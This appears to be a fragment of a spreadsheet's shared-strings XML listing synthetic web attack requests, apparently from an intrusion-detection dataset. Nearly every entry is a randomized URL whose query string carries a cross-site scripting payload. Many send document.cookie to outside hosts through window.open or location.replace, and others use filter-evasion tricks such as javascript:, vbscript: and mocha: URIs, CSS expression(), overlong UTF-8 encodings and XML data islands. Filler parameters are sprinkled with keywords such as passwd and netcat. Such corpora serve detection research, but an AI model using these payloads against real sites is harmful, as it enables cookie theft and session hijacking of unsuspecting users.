    <t>/scnknzhbcy3kdvwnk/amo@mvesvl5dnwd1wdlt/aq5cgomjpyqyfur_p1r2/fwzupfxuf8/ltssrmeimelati/adusmkc3/nmn0ap4rcpaccess_loguj/lzrws8rsqu.mspx?ttson=&lt;input+++type++=++++"++++image++"+++dynsrc++=++++"++++javascript:[window.open('http://128.141.7.252/elerar.pl'+document.cookie);]+"&gt;&amp;seh2ne=sn&amp;niiincauplthny=o&amp;lnjie=g_qkwoljn.q&amp;bnacltmot9eraer=qyraa72hettbpd&amp;llen3isitr=neh&amp;ared7=x%u\\ni&amp;eobnmnrh85eene=otr&amp;stni6mlsde=aa4o2luni8ya&amp;m1@kmssls=les+e12lav5oo&amp;ororcsnsnwds=4hthsmdr&amp;ade=u&amp;tsrtoei4t=53001148</t>
  </si>
  <si>
    <t>/sthcarnaaesot5/75hd_mepmg9utvclz/yr2sh25xhd2/5ft/9ozeq2xode9/di.dyro-m6/fr/e0oqkm/leckay8uutsks.jpg?dbltddoafvounes=sstgrnhttpsvbscriptpexecrae&amp;ett0ytarro==nhqaedoi5tpi&amp;wpasswdnetcatpcy99=6844911&amp;ja5metajmailvibmj=3503167430&amp;twm7s=8sjn&amp;eyntou=tcm-lfvso&amp;8-6@x=98264908&amp;on4ho=uiu&amp;etbj2rucp=tx39&amp;eiosen1=rgmx&amp;1zdsubdsnsma=sl&amp;ddrczeeaoo=i"++++&gt;&lt;bodyonload=alert(document.cookie);+&gt;&amp;3a=8updatesnl</t>
  </si>
  <si>
    <t>/i5gmsihattnastam/eqscb5gi.k0.yl/aeposition_bre/aeaefxxsir3/nqp/igabino0p361/tpvxgkf0r-/es9ls.cfm?r7aneirc4=44&amp;ia2=o:&amp;lusaa=s2ioltehta&amp;urstern=sdgr2ti&amp;cvc2yaopenbm=+yrw1c'4teepte'+na&amp;c4ryidiansd=xthp&amp;ny9link23lmailb_co=7mpqe&amp;anqutk7=17751&amp;r5cposition=&lt;div+++++style++++=+"+++binding:++url([http://www.anenoror.com/script/ogl.mdb]);+"++&gt;&amp;catwmtsad=27&amp;hc1=h2qpzry7</t>
  </si>
  <si>
    <t>/jismh0dv2rj/iiy5z_nox/wonullnvd1viframe/psl8jqmepok4z1lnv.swf?c1i7n1onohog=t+ee%evrd4&amp;iawghgeearrter=&lt;img+++++src=&amp;{[document.location.replace('http://www.teiler.com/cgi-bin/orndtadeit.cgi'+document.cookie);]};++++&gt;</t>
  </si>
  <si>
    <t>/jutpassthrupw7e5eif/tvzove64.rv9.png?syenaaoeeholwn=[\\xc0][\\xbc]script++++&gt;[window.open('http://20.12.202.21/raonle.asmx'+document.cookie);][\\xc0][\\xbc]/script+&gt;&amp;bfta3e65sttozt=734085196</t>
  </si>
  <si>
    <t>/4ndtsestere/ztp-documentkwinntjs4mailomwj/issicsmgtm/toetfe/qhup.jpeg?7u=&amp;{[alert+('al0e9iec');]};</t>
  </si>
  <si>
    <t>/sopenjnull4slocationr.css?1ta0=817&amp;18ijh00aoimg=&lt;script+&gt;alert+(++++"++++hsxeotrtgo.l6lbh")&lt;/script&gt;&amp;tii=7755516143</t>
  </si>
  <si>
    <t>/hrtwqtuiit/_6y7k8hvg7due/invg/ygp8yht/tq/crsqu4ppa/fbq61qt/osi/uyg/xes5n2estuagse.jpeg?i7aoneqmo=@itghpstmt4irt+yam%'b&amp;1d3oq.0lwd8=hd&amp;8uioaeiun=fdnyentopth&amp;autoexecsn0z6dg=301712534&amp;ihe0lml7b7woa=40&amp;sbetlefs=5366&amp;jp5axj=497103&amp;miysnhcn=08742&amp;amh0n3hoe=&lt;div+style+=++"+++background-image:+url(javascript:++[alert('t9eo');]);+++++"++++&gt;&amp;mgrew=56&amp;i2kheni=176565121&amp;ici8=+at0ojscieosf&amp;tjcnq9=am&amp;abgitf0t=gkh0kijz&amp;cppx=wbzys</t>
  </si>
  <si>
    <t>/tck5yaxs/eebtdonj/m5an/r2qzck2@5p/mvrttk/dil/llgqaab62/geener5eae4eal.js?enrh8s=deo4edtbre8o&amp;puslddhftt=%ox&amp;rrmhne=0+doy&amp;eo8tiyo3t=mautoexeco+;vetcifaa9nagl\\eex&amp;pdulv=7751&amp;anas=euyftrsu40x&amp;s6len6n5utw0d=ltns&amp;oekeieslf=&amp;&lt;script++++&gt;[window.open('http://1.127.85.114/dell.nsf'+document.cookie);]&lt;/script+++&gt;&amp;eua1idoai=is&amp;lhath60=0994317&amp;znpri6bodymbj=d5https&amp;brjinkhaving=3iohchr&amp;pdeleteandshutdownxmaile@4=twwdiio</t>
  </si>
  <si>
    <t>/1ntraeoteranlvr/kin/ta1eesh3o2sagsn/_7yautoexecstdinvfidigwk/et-gwihhmahx/qxqpxo.php?chni7yese4ohh1=&amp;{[alert+++('liw4ecoi');]};&amp;oaaaek2lssor=t8uhrdpstu&amp;9onlg=20</t>
  </si>
  <si>
    <t>/rgeopay6xuhaleenec/yjda-utsv-ukg/e4en3ac/obssotttddtdwtieabn8/thte/lrwndatlhoreis2dl6el/eett5aeaetahnl0t0rhx.gif?m2z-=&lt;link++rel=+++"++stylesheet++"+href+++=++++"+++++javascript:++[alert+++('nulfnhde');]"+&gt;</t>
  </si>
  <si>
    <t>/scriptd4k3ry30t/dau0vq/fsqttnviv58.iframe.php?hlernt=&amp;r&amp;ctsskeeiheie=dd&amp;ibbkmiz85n=&lt;img+++src+=+++"javascript:++++[document.location.replace++('http://www.alsintor.com/cgi-bin/alnt.cgi'+document.cookie);]"+&gt;&amp;cnhgdwannre=itte9hosirlgh2r1&amp;fournenoeet=149&amp;lisgp=rrglerogo+s:ne&amp;lposeeiz=4896272</t>
  </si>
  <si>
    <t>/eftgeyotoodg7s/osavky9xonlisq.jpg?uaraogmtat=tgrcqc&amp;enr=npselecteotelnetcpoaet&gt;[+dbes&amp;asr=d2asqmai61q&amp;oopm1=08&amp;eea=&lt;img++++src=+++"++mocha:[alert+++('ant95nu');]++++"+&gt;&amp;7g7smunhhtet6i=]i&amp;7ehw5hdtocmai=d5e8w3c-q&amp;nhmerklhgcuew=74534&amp;uayc5re2si=b&amp;e3jtin1=nrin&amp;r2qsg3oud5skec7=tmp\\+$;emochan4le&amp;siirnibsl=ah</t>
  </si>
  <si>
    <t>/aes.qd.x4w-9qzojsx3/ossneifrkde/neidsrq0rj/ljq9_yntqtjkxq_flhph/tp7nv/rerly/tni7rrwct6dceotedo/6fromzmd8etc/ha3/simt9aenesl/5pze.css?dhaut=&lt;div+++style++=+++"++++binding:+++url([http://www.de.com/script/tdaosar.sh]);+"++&gt;&amp;e8a=56502</t>
  </si>
  <si>
    <t>/tklzxtva0jlr1yz/hfsteattr/tfy/sjw/elzq9y8vnggw2r/agooeoessnserburl/jileota/3il8qhl7aohtd4th.aspx?esol2oafc=pshflasaaarih&amp;aoicca=6&amp;rvnge1=n42&amp;ssac=o&amp;oee17aufd=176219&amp;karmtrrtwhaae=miebuh2aoirhr&amp;i4lle=ch0atv&amp;sxueekehib=n0dodu(aadvh5&amp;7z3go=fnq+&amp;sonnj1fspetnmu=iron1d&amp;fromlmcmkcatmlv=&lt;img++dynsrc++=+++"++javascript:++++[document.location.replace++('http://www.seil.com/cgi-bin/rolirist.cgi'+document.cookie);]+"++&gt;&amp;aeir4y=eof4waaesvg&amp;owasimi=nm+aedocument1mtosyet+&amp;eerpshss4e=hdn</t>
  </si>
  <si>
    <t>/hdeerpihalria/dss@jdm4gk@wizrk..shtml?bnvoyroa=&lt;img++++src=+"++livescript:[document.location.replace+++('http://www.neleenni.com/cgi-bin/lletde.cgi'+document.cookie);]+"+++&gt;</t>
  </si>
  <si>
    <t>/td/ersahodgrln6hd/lzrmfxzzyji_gs-ix4v/s6fe23eeyrpw/etorpbeu/ytpnatc6htt/doan2asinctraueaio.asp?tawx9a2=op8bts&lt;ammochar&amp;daxdudrtnbat=096283&amp;itf=1699&amp;tsbpg6tdxidc=h.03url8o&amp;aaeeoeao=&lt;xml+++++id+++=++++"+++++x"&gt;&lt;a+++&gt;&lt;b++++&gt;&amp;lt;script+++&gt;[window.open('http://163.162.35.155/ie.asp'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b+&gt;&lt;/a++&gt;&lt;/xml+&gt;&amp;ay2eg7hrh=it&amp;wi=6245505814&amp;eeycdisi=kai&amp;fl2ir6=oe&amp;4qfq=36&amp;aenynhenx=3253&amp;deaauuaot=1183431</t>
  </si>
  <si>
    <t>/nihhjsjetnaaet7a/s0k_7qqt7u2wlo_bmqv/cgmvj/khdhlo8d@rcfrt/dhar95tjz5wgm/tmoa4nx/btuchchild@frum2ga.asp?20iui=&lt;img+++++src=&amp;{[window.open('http://167.95.79.206/lldeti.cgi'+document.cookie);]};&gt;&amp;vi1xikff=409392698</t>
  </si>
  <si>
    <t>/bsp/cdzpei4/ei2ktmdieahliseolue/l6shasc9e/da9ne9oqt7eetc/epks8bmhcfz9_m2/sdhfnaxenrn34tinlin/39m/ran3/t6r9cgjracfaetrca/tt.cfm?iesieam=see?sms&amp;tdoedteatrvt=613101&amp;o1clnreflth8=752573&amp;hxtohhnttt=i5ae42g&amp;_wwrzqzyfwar=e9hnf&amp;te=&lt;xml+id+++=++++"+++x+"++&gt;&lt;a&gt;&lt;b+++&gt;&amp;lt;script&gt;[document.location.replace('http://www.toto.com/cgi-bin/orgechnd.cgi'+document.cookie);]&amp;lt;/script++&gt;;&lt;/b+&gt;&lt;/a+&gt;&lt;/xml++&gt;&amp;jehttpsxggr=u%ltzals&amp;ndg9e=d4ysn&amp;edq91iex=sggs&amp;zk_fmetaajtid=906645&amp;eiuo6rhhn=+ahen2x3e&amp;csocqre=ejn&amp;ceiohen=aogf&amp;eujdoree7t9o=|7a&amp;aas2l=8625861</t>
  </si>
  <si>
    <t>/fkf3gh8gthi/3laf8aa/nju.css?nqlaunyainur=w5&amp;di=ersllaso&gt;aes&amp;9u4ixti=gm-(location[&amp;nlsceefj=yrif&amp;ldahljnfe=30096&amp;dscripty8hmqwbv=eperlet2haao95&amp;scrqsebonuhtne=&lt;xml+++src++=+++"++javascript:+[window.open('http://193.106.114.49/elal.dll'+document.cookie);]"++++&gt;&amp;iaoss1adr=56954104&amp;fnzssne=tiadmins&amp;6ek@9zfbj=nudge0oenemsiya&amp;oauos=l@j31niv&amp;teehi5dien=i6t&amp;2o8vc2sic=eetaottcleifnde&amp;ntqi=accept+idenmoeto8logeoha&amp;ndnwe=g+xtermo</t>
  </si>
  <si>
    <t>/leyhhpzeoyrc/dmwt49ksystem83replace.bin?emssdfairhvi=5846&amp;iieshed=n&amp;rnkithss0enca=&gt;&amp;jgj-=f47$&amp;eryitejet=&lt;a+++href++++=++"about:&lt;s&amp;#99;ript++&gt;[window.open('http://43.104.22.66/romeis.exe'+document.cookie);]&lt;/script+++&gt;+++"+++&gt;&amp;inuzaoneuna0hn=017356635&amp;pohc=891&amp;srndws=%ua(-etnno4nnqtdiframean&amp;v9i=oehnebe&amp;4etodtrlonojntq=ea\\r]6)nctde&amp;rtpn=425573860&amp;gx_in=ei9earzatfa&amp;5h1hsahreve=reinmailnetcateq</t>
  </si>
  <si>
    <t>/.fsgx/tj9q/i9aios/jhatpmtilatn/inha/nioliymi/kho/ate/nsvguhylm-o.php3?cxxb2rvj8b=t&amp;8nin=w]lic&amp;edywtprneaszoi=3833528&amp;bz8urmxmlservices=126245&amp;lhulikey=&lt;style+++&gt;&lt;!--&lt;/style++&gt;&lt;script+&gt;[document.location.replace+++('http://www.tiitte.com/cgi-bin/melies.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/jtrecyn2s9ltkq-3wsox/eby7cql7sy8zw/rijlwckzwrune.mz4f/fnsztasidntlrseol/n9n1/rmq7unoiv3lxlv/s03nlf7m/so5aefue4oevrr.php?ot=en%ha&amp;b9lsqiror=&lt;style+type++++=+"+++++text/javascript"&gt;[alert++++('lonn');]&lt;/style+++&gt;&amp;si5r=za8ge5d..e.</t>
  </si>
  <si>
    <t>/sepv/vohhains/a2/tcs/vcmjwvlk-/gik.@osool866v4x8-tp/weg/9eoaii7ohgo2yu/ilr.shtml?h8s=i(o9hul[1\\rtrqoh4imgf&amp;dsttcieo=ocl&amp;gsolx=e8oaacceptfoeasi+eh&amp;eai=92362411&amp;eoiogeldmaqy2t=xe7ts0osethilee&amp;see3satuioht6t=en7nos&amp;rxytj5huom=&lt;div+++++style=+"++width:++++expression([window.open('http://87.124.210.0/ro.sh'+document.cookie);]);"+&gt;&amp;faejsfieetoowbs=m&amp;0rcxtnr=dl4avt2e&amp;nlyc=drbozeesu6&amp;8timnih=efnqat</t>
  </si>
  <si>
    <t>/e6cbiecrqcesttrndhg/x5eoil/epsskaulre.png?zsniuhe=+lrqhnldesedn&amp;td2qcaednh=3ell&amp;foc9d=vyee0peufkrde6l&amp;eoo=otr.&amp;cmtoteik6aozsl=nnin5o+ss3&amp;t1we_c=&lt;![cdata[&lt;!--]]++&gt;&lt;script+++&gt;[document.location.replace++++('http://www.tima.com/cgi-bin/silenillnd.cgi'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;ha9hth=6&amp;rea=a@icn&amp;cotom=21&amp;kgx=igi8dtoi</t>
  </si>
  <si>
    <t>/iorrmdeinpottl/ri/qa46lc8ehrjt8dy/htpasszylmwheretz/7ierlrdar5xfu9tunuu/vw2srvinttaiyhlrdo/ueratwtpb/9@75kyjsbucm8qn/sco.htm?bilehvyt=2&amp;dhblaeeand=gidl0nst0hdtmt&amp;7vbscriptgjbltqk4w=mmb478javkj&amp;ltdh=m5chmr&amp;0oulsz=&lt;img+++src=++++"++++javascript:++++[window.open('http://252.68.192.186/vetoil.mdb'+document.cookie);]++++"+++&gt;&amp;aiwssmz4c=gln1nsaroovscc&amp;2eonnos=ewdegoeirdd51looe&amp;rtt=i/mu&amp;eafneo1ifitdgri=t3&amp;iioisraea0q=(toa=h&amp;@ir7-mcmd=passthrulanl|mzeincludedlocationza&amp;moaha0ilaii=lib9ams(n\\7d</t>
  </si>
  <si>
    <t>/nidyaoepeoirtdi/ctsxtlr75tt2ao/m9phz_cx/tnir/i9og@rpky/mqbj5guxcyk@ri4-_/qsr/xhrnzkm98zrfff-9ih_/rcp9hzinsert/esrawam/g6i2zblf6swa2sdls/ow.asp?ezdusabv4id=solg3cste&amp;nullopenywv1z=em4nliteseshnn&amp;ieme2eg64=6399682778&amp;h16i4w55alte=8884506&amp;xhvv=doeceiiaccaty&amp;ksrpqszse=uittegt&amp;gandclstsor=s+b+eibe0o&amp;wp-jp-_=7&amp;jbew=mmohpak8wgorsopstio&amp;tawtilit6hg=&lt;meta+++++http-equiv=+++"+refresh++++"++content+=+"+0;url=javascript:+++[window.open('http://201.107.160.9/ta.exe'+document.cookie);]++"+++&gt;&amp;n17t=p8;eiracopy|ea&amp;grrt5dlfh83qeg=it0iniwsu1e&amp;9shhrmaeseeioal=thvuspc4ecnieprocessing-instruction</t>
  </si>
  <si>
    <t>/rdeog1f/lwh/fnbehv/nbbkca5aksfgxjsufx79/hlwasc/nate/-mexesock_streamc/l68om/e06jq7mcp3sojoks./lt5-ois/80sbnilimaerlqu.cfm?c4bm2llxtermaj=818&amp;ean4n=180&amp;td1lrilien1l=;1rv0anlf&amp;-yu34m=iitsjgedaee8ahsprn&amp;oldhhplebqnui6r=65280&amp;z@sz=&lt;img+++src++++=+"mocha:[document.location.replace+('http://www.inet.com/cgi-bin/ndlereilta.cgi'+document.cookie);]"&gt;&amp;tie6dcw=r&amp;g2nwrs5e7=5863&amp;lduftznteo0no=436747638&amp;oialcia6kdqrt=id/tmptbetweene&amp;q7nmmesfis1=8990&amp;dkyug=%&amp;6bnuolocph=i5toxsitf</t>
  </si>
  <si>
    <t>/i6z289-95jsusls00hl4/sg/an_kfe2wflxi9msrdh/uzbaigxpa.48gjbd8pz3/zesspqt4/os5sui/eagdpyzjcjolf@o/ahtobv.asmx?yts8t1=2533&amp;2atunns2thdmy=28072&amp;latan=35&amp;r.execvreplaceaccess_log6iktq-=[\\xc0][\\xbc]script+&gt;[alert++++('psiiib');][\\xc0][\\xbc]/script++++&gt;</t>
  </si>
  <si>
    <t>/ciu8c/i97m8f_mf34/jfyfhmixpto/sdhrt.5.taie%uoptv/earksyerrtmspeonu/sskancqa/dcle/ra/xru0apkozbadvz.shtml?equh=7918461&amp;tsmiwntti76=tunaetutl7&amp;xelinayupaut=rf9ueze3&amp;scxyetcg-qg=&lt;xml+src+=++++"+++javascript:++[window.open('http://83.189.61.86/nsti.dll'+document.cookie);]"+&gt;&amp;tuxet=734731&amp;a1mu6gkd6gu.=ie+1&amp;r2e=utm</t>
  </si>
  <si>
    <t>/ttnrtnaehhoiresdle/ib-httpnaukls4y@g/dpxd/niwjv77-2ahm005/ypxm/le7t/onl8kwtwsgg/i_b9vade9khtq/qw9/vzbrne/dde2a.ybaseq/droh.jpg?.2ow3ydeletelinkbe=av5@x&amp;at=spr%hh'oss&amp;ueuk=shileegpsh&amp;asn8hhrp1eq0=bscript5t&amp;3mtmss=&lt;body+++++onload+++=+"++++[document.location.replace+('http://www.ol.com/cgi-bin/nttaan.cgi'+document.cookie);]+++"++&gt;&amp;asidksamrpt=)oaps=&amp;20hofnetadeiodn=036026</t>
  </si>
  <si>
    <t>/egis3nngte63/m.foxr3/msak96cdygpt/hg.iatrb.php4?jaog=446&amp;msnpc9at=eyw)n&amp;cqdo3ettaabru=&lt;style&gt;&lt;!--&lt;/style+&gt;&lt;script+&gt;[alert+('hsnez');]//--&gt;&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/m7ieedaw1v.jpeg?dcpeoct=ftp2oe&amp;qav4echoylcjetc.=elpat&amp;vkcmxnwaf_=rwlladuhrev4njix&amp;eurrsndhy8ele6=6204184&amp;btms=fttyadiana5t&amp;ou=te&amp;urrmessiiso=488436009&amp;edb==dasz&amp;ayboot.inikpetcf=tcs@d4&amp;jxf0locationcsj=r&amp;=rcplinput+ld~vn&amp;ygl=&lt;img+src++=+++"++nineetictr+++"onmouseover+=++++"++[window.open('http://72.119.121.103/ge.asmx'+document.cookie);]+++"++++&gt;&amp;xrmteuvnagpl=6310900400</t>
  </si>
  <si>
    <t>/vlakw@6/7xg00evjr1ftskc/f56o/4asuv/tm4tbsd24zubn/-m/aaxfq/ugrteh7d-06e9qu/rdmft9dopkaktw2vf1yn/ln1tmveeaj.js?oe=7346&amp;7oenrndo2yensmn=gtsh++style=left:expression(alert++++(ogtn.1p3))&amp;thmlh=;weryt0a</t>
  </si>
  <si>
    <t>/-je.ru70/ctj-uje6b/pn/1t@noak3enmdwd76h/qhhfxm0s/kyeqiq.php4?gkieomsn=oa&amp;ns=2954289368&amp;vdcbh=sh+tauirimgplh(ma&amp;sorec4etswure=script+++alert(aier.eesmuf)script+&amp;qmailqformr=dhtste1&amp;processing-instructioncos9q=oeelssrihtpassldno0cnieg&amp;olgros6aasnq2o=ouelhe</t>
  </si>
  <si>
    <t>/iyttsort2sscpnnuw/cboot.inixtxxtermjirz/esuigi99rraz@/ib7crhrahamo/edi_vnkr/t7dineoi/a0y0wokwk0h8d/aidborro/dconksffzu.shtml?fxdenszdgejlk=tfnodiboryr&amp;a4lmsahfnii=zf5xh&amp;eat7tozpatp=menmlossl&amp;hajyjsgic=92439542&amp;xwinputwy0hljr=k2tcjbodyekiocatls&amp;egnynhrcomtte5o=oftpmocha&amp;tdenlmicrhn5ve=&lt;img++src+++=++++"++mocha:[alert+('2alsddt');]++++"++++&gt;&amp;rln2n=8eiome0eedrbxhce</t>
  </si>
  <si>
    <t>/ecyudfmx8_fqoif28/yezdtwe.rv@eo/vw_1qp6bqzservicesdia/je401ztrexec/jncfu8y2ccb3bz-/s8g7mv-eh/nuutkchg2hcmtrseu2/jazv/ubtcemrteorsan7/odsc16zd.dll?chqtnweloae=btn)[6phpl&amp;tdi9l3nftphdt=8&amp;qur=44@sf&amp;erstsgk68s=&lt;&lt;script++&gt;[window.open('http://117.178.218.173/tori.pl'+document.cookie);]&lt;/script+++&gt;&amp;ipngn3otdeasof=slbflikelgoio8tbfsoh</t>
  </si>
  <si>
    <t>/2v2x1csyohdfhw0/iuzn_tw2/9ennreuhif2ron7yzm.css?trmwioaen7iin=tacf&amp;neeeev3zspi=+b3&amp;ahqtdttbiyxyz=o+++++style=left:expression(alert+(s0e6r.eedgt5))&amp;0uytb7ro4ob7=70</t>
  </si>
  <si>
    <t>/r90tpa0rsreeoetmie/rexjxcl/gdggga8-n9/el/0itmep/r6nestylet6/imnkbq4ah91/eoo.6h.owmqc0/raeetaglusc/swwcoouer1nrnrpsa609.jsp?ya=javascript:++alert+++(++++"+++roek6s.36lcua")&amp;tdoiesumzpntek=;)1n6</t>
  </si>
  <si>
    <t>/hqtlpdor.vdysncq/5dz0_kxs6g04uo/iqno0hevqdxzd@ut0/shbf/s4vavltcyxs/jh5ro/sazotvwsyea/se.sh?iltktjetq=deknbetweennstx&amp;atbdsnta7aio=404&amp;1rtgtgwtqtoesee=a0mail7+8nltireesr&amp;zr0slqnesod=e=bersm&amp;tw5egsdhetljdt=feger&amp;9d=&lt;a+++href="++++javas&amp;#99;ript&amp;#35;[document.location.replace+++('http://www.ntasonns.com/cgi-bin/segech.cgi'+document.cookie);]+++"++&gt;&amp;onndenvpteawe=tremoo&amp;svjs4-t=etoh&gt;o+ttl)</t>
  </si>
  <si>
    <t>/ossei/zkytx/zhrhzethrt/sk0-pm4p.3/ladscwxeaur.cgi?ehicewnlv8e=aus9eeedtndtyin&amp;jv9passwdmz9ok1=lhnafaj2dsalssge&amp;t7el=gs+&amp;r4nt8=3275&amp;sirt=se|zc&amp;yteig4=aycfthneee&amp;5dep&amp;oteucioh=8aetnghennomietsmf&amp;0nuam6nh=555890878&amp;bwuith4bte7o=+lsekr+tscripte?dw+wtqzt&amp;lhodiv=ecat&amp;yawa=euymc&amp;i6=rrewtaao&amp;1xna=kednvobssmetshnuw&amp;fuw227lv7azo=&lt;!--+--+--&gt;&lt;script+&gt;[window.open('http://98.55.68.31/mesita.cgi'+document.cookie);]&lt;/script+&gt;&lt;!--+--+--&gt;&amp;torr=536</t>
  </si>
  <si>
    <t>/oolsa_5klakv/hidmrfbknmdvl/i49aesro3cfhb3at7rf/oqzb/epaecoreae5ieniyu/j8k@49include6dyz14jz/jpz-5/hleuxitg/iv7iaoal4aesaedy5e/iygus4/hoydotatjrtdaeremhr/8b7bgfr1e.php4?suo=4921309&amp;sttie=7tnreplaceoe&amp;emeb06=apj&amp;pjucyesltl=wp-ljpiyetc3ihrr=st5i&amp;nd=azd.0mvhrvg&amp;9onlojnnsnch2t=&lt;link+rel=++"+++++stylesheet++"+++href++++=++"+javascript:[document.location.replace+++('http://www.geelsira.com/cgi-bin/tage.cgi'+document.cookie);]+++++"+++&gt;&amp;r3nu=9428</t>
  </si>
  <si>
    <t>/u8lvbnz/oogtnirds/ue/ora9t1mndphpxfuge/6lf63gbul/i2yehh8sa/cy5g0eu/uu.cgi?mriimirtymeee=5rer+&gt;ee&amp;rbpl=d9nifd&amp;8l3ny5hmceeoab=24464152&amp;e8eed=&lt;iframe+++++src+=++"+++++vbscript:[window.open('http://188.73.173.110/nsoril.aspx'+document.cookie);]+++++"&gt;&amp;fyb5ab3=mannhh|iroi&amp;cosnpatwd=228238&amp;qgschtpassylog=wc0tierriajrutse&amp;o7lwi=metamocha1t&amp;hesidho=dmeoah10d&amp;tfnsknal5s=edspassthru9i&amp;hsrsheckg9lnea=992086586&amp;t9ttvfshhpsr=t&amp;ttleseaemtiecb=tgi4b@</t>
  </si>
  <si>
    <t>/3zcuzvcx./n0dl/w6n4httpsgujt2ir/iam/ncasnjttdams8/ebb8kq0pd2r5b7f/d8bottgde6ukcyjk/t1abtrrhseabc4nnhkef/t0kaoeeuteeubcov.htm?erneiy5euitx=u7xqt&amp;pd8fntao=7711&amp;r21493eta=yewepessohanp&amp;eisnedmtt=tlyg_&amp;kw24havingx0=&lt;form+name=teleas&gt;&lt;select+name=s1ar++&gt;http://www.r.com/oened/?&lt;/select+&gt;&lt;/form++++&gt;&amp;yl2esme=2dlbrefnnulla&amp;nnee2nwngme=esabb35cq</t>
  </si>
  <si>
    <t>/cykjdng9bqf_.mdb?hust=cdbhgrceztggasr&amp;lrrmniesi=25&amp;mehpyiiht3=oetf&amp;oesuaata=&gt;s'u&amp;aecbbsuvsetundj=35&amp;ets8o0esel=eqtu4zs4fb&amp;zboot.inipz=dihstyle&amp;ma=r7t7fbor&amp;ucpgrh1uhsr=bgsound&lt;qatpsu|rl+ir&amp;s7teebswljr=859&amp;lelpi=&lt;form+name=b3++&gt;&lt;select+name=5++++&gt;http://www.3eswwo.com/tov/?&lt;/select&gt;&lt;/form+&gt;&amp;4nhhaena=765925&amp;qkwcgqvo=1463187</t>
  </si>
  <si>
    <t>/nhvq@cdsel8c/e3sau/pz/x23vdgp3wyiqdqd./tkfuh/29rcatl/nlibjv0ci4/tv/yc/d5x_drrgdf/to.gif?httpu6n=m7orstyled7tuhii4+7dusrhh&amp;6ce8e9=eyibr8arpneeyee&amp;je0t78=n@j5garzf&amp;sm=iniaexec&amp;2ownizeml=ailar&amp;iofbocm=528&amp;amohdfrwenst=tdonei'&amp;jteiugueueo=&lt;img+dynsrc++="+++javascript:++[document.location.replace++('http://www.dech.com/cgi-bin/vellat.cgi'+document.cookie);]"++&gt;&amp;raiutnnnda=98188&amp;e8remees=aevdocumentzh&amp;d1ihtheeta44eef=ieoethhtoeal&amp;mk=[kjd&amp;i8teiolays=e9tid2nrinlplpo7&amp;andz0wp-=oxml0sknr&amp;iua2er=9575</t>
  </si>
  <si>
    <t>/njwur1m-i2k4tvsa1fl/htycmatspefeyi/x0updateuincludel0ky/sojgbt53/n@u0rsfoj6g4fxxp/aesx0tnt/saej0ymoxidibbt/liva0e6v/hd_kmqynk/1k8ctevalcahtpass/of1uqjqh3.pl?ax=&lt;xml+id+++=++"+++++x++"++&gt;&lt;a&gt;&lt;b+&gt;&amp;lt;script&gt;[document.location.replace++++('http://www.isnadeto.com/cgi-bin/endenditon.cgi'+document.cookie);]&amp;lt;/script+&gt;;&lt;/b&gt;&lt;/a+&gt;&lt;/xml++&gt;&amp;njobject9positionxxw=bodyoboot.inidbhoee+&amp;amfpahwp-ocxo=992311&amp;etutcneemiuro=5838988&amp;oesdi3sle1baade=enweeislencateap&amp;3tiyiobom8d='t&amp;usrtqun2zx=heds&amp;neexpti=iotrbtmlpoyt&amp;ctdfomailii=bhfwpllzyww&amp;ia=ir8lexuaz&amp;xzohjdeitwedn=rba.tsjgdmhl&amp;eendrisw=lu7rpl&amp;e3oi.xxxlzi=vho&amp;4asno7eci7fmhln=9155&amp;grahaa7feuo=9827821</t>
  </si>
  <si>
    <t>/5ugm_bynak2qs2d4/8actlsryd6rs/suixtehranec36fspe/arhaftl.jpg?tyjzvfrom9=&lt;script++++&gt;alert+++(ej6u1.we1t)&lt;/script&gt;&amp;hmshes='golm&amp;xp8cfrjzax=ec&amp;0tmayd&amp;4rdkzydumeta4=hsd2</t>
  </si>
  <si>
    <t>/nqz/ldcvnhgj9emslvd.tiff?etuf6ooa0gei=619&amp;6gdepn7=063&amp;kfq3bmoncmailswk=&lt;script++++&gt;alert++++(aibdo5nefaah.telos6)&lt;/script++++&gt;&amp;neteofiepe=e9aes0l&amp;aeorylon8troir=4hen7f1wo1&amp;clkdij2=voo74&amp;+e&amp;a&gt;tosmtga&amp;arhaiexecxtw=31&amp;ob=34&amp;nnnlar1u=402</t>
  </si>
  <si>
    <t>/w4885ixzjp/opt8ay_srfe3.shtml?ttaacynschl=&lt;a+++href++="++++about:&lt;s&amp;#99;ript++++&gt;[document.location.replace++('http://www.asesnang.com/cgi-bin/ngteicnd.cgi'+document.cookie);]&lt;/script+&gt;+++++"&gt;&amp;wsab=8easegp&amp;nwrcptelnetpjo9=tmpt+ia&amp;/netcatdocumentssm%a&amp;haytne=divsc&amp;nir=oni&amp;burren=lowtt+d&lt;r&amp;edmocjnsmvle=eaozl&amp;ne1sl=ss|edt(&lt;usgtha[omtphpe&amp;udedss=21&amp;eystunna6md=s(3&amp;rhefntj=0737</t>
  </si>
  <si>
    <t>/hxaoran/ihtnja2zoadt@/ahtt/ba3rfeei9/r1dd3nai2eer9nsf/m3g8babr.php4?e6onr0t=nnph-&amp;4selecttucgxmlshusr8passthru=76400&amp;6scripthygd5=nsrrp&amp;4rpoacehfzttie=091365141&amp;lu=d9uton"++++&gt;&lt;bodyonload=alert++(document.cookie);&gt;&amp;rganrbctaiqer=e</t>
  </si>
  <si>
    <t>/m3ca/edlink0/epsorelr/pzqpj7rsbd.shtml?g2atexec3rtechoeex=&lt;div+style+++=+++"++width:++expression([alert+('htje');]);++"&gt;&amp;jsfg9t=0128&amp;qysamwflogwplq=97722392&amp;9pap=skfgavdoj3pt&amp;dbomcc=42&amp;0whtpassn5ff%uwpv=ecf&amp;580apbetweenybgx=?uj5sptolk6ra&amp;ae33raifdlolbot=i5q70-jzd8vt&amp;a2h2ri6ujitarsa=+sioasn3d9eu-vi&amp;sn=8&amp;sishbi8e8=p&amp;emit=xtoeqs6elwleeuarl0&amp;u1r@inputwuftpexv=165043</t>
  </si>
  <si>
    <t>/gtlsz@c0-l/g4cpmzofyjmlkzwlrzd4/lz/.y9p-zcz/t.4flx_qvtl/-fog07frk5i./rcvclvqjq/5o@67sdxpswhere7r/eeamrrtp4qn/yhtacces0t.o3/hsfps9n7/liloctlpvyoleiege.jpg?u9wm45qyth4=[\\xc0][\\xbc]script++&gt;[window.open('http://120.242.9.141/taen.asp'+document.cookie);][\\xc0][\\xbc]/script&gt;</t>
  </si>
  <si>
